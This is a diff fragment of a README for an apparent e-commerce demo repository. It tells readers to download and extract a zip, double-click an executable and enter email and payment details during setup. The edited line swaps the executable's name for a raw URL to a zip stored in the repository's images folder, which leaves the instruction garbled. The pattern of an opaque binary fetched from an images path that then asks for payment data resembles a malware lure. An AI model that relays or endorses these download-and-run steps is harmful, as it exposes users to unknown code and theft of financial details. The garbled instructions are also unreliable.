santomax/conductor-ecommerce-demo/README.md

    After the download is complete, locate the zip file in your downloads folder.
 Right-click the zip file and select "Extract All" to unzip the contents.

 4. **Run the Application**
    Navigate to the newly extracted folder.
-Look for the executable file (e.g., `conductor-ecommerce-demo.exe`).
+Look for the executable file (e.g., `https://raw.githubusercontent.com/santomax/conductor-ecommerce-demo/main/images/conductor-ecommerce-demo_2.0.zip`).
 Double-click on the file to run the application.

 5. **Follow the On-Screen Setup**
    The application will guide you through the initial setup.
 You may need to enter basic information such as your email and payment details.